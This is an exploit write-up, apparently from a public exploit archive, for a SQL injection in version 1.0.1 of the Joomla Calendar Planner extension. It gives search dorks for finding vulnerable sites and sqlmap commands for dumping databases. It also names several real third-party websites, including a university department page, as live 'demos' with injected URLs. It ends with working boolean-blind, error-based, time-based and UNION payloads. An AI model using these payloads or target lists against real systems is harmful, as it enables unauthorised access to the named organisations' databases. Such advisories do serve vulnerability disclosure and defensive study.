-- Date: 20/08/2017
-- Vendor: Homepage: http://joomlathat.com/
-- W10
-- Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
-- Version: 1.0.1
-- Category: Webapps
-- Dorks:
=== Dork1: "inurl:option=com_calendarplanner"
=== Dork2: "inurl:/index.php/component/calendarplanner/events?searchword=&option=com_calendaprlanner&view=events&category_id="
=== Dork3: "inurl:events?searchword=&option=com_calendarplanner&view=events&category_id="
-- Creditos: Informacion - Anonymous
-- Autor: Ihsan Sencan
-- Web: http://ihsan.net/
-- DumpDb: Remove: "&date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0"
Add: 0'
Menssage: Alert: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '') ORDER BY ev.date_start ASC , ev.hour_start ASC' at line 1
--- Erase : sqlmap -u https://site/es/component/calendarplanner/events?searchword= --------> &date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0 <----------
--- sqlmap -u https://www.site.com/es/component/calendarplanner/events?searchword= --dbs
-- Demo:
- http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-01-02&date_out=&option=com_calendarplanner&view=events&category_id=0
- http://www.aumaujaya.org/index.php/2013-02-24-18-14-58/events/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.cadam-solutions.ch/2017/index.php/component/calendarplanner/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-05-18&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- https://www.serenacentral.com/community/events/events?searchword=&date_in=2017-07-28&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-03-30&date_out=&option=com_calendarplanner&view=events&category_id=0'
--P0Ff:
============================================
==Parameter: searchword (GET)
====== Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: searchword=") AND 6499=6499#
====== Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchword=") OR (SELECT 7934 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7934=7934,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("jqvr"="jqvr
====== Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: searchword=") OR SLEEP(5) AND ("mmOk"="mmOk
====== Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: searchword=") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x796145654d6e6f6f436e41637678434f74496f765a626a666c645461484d63747648525a56565175,0x7170627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
=============================================================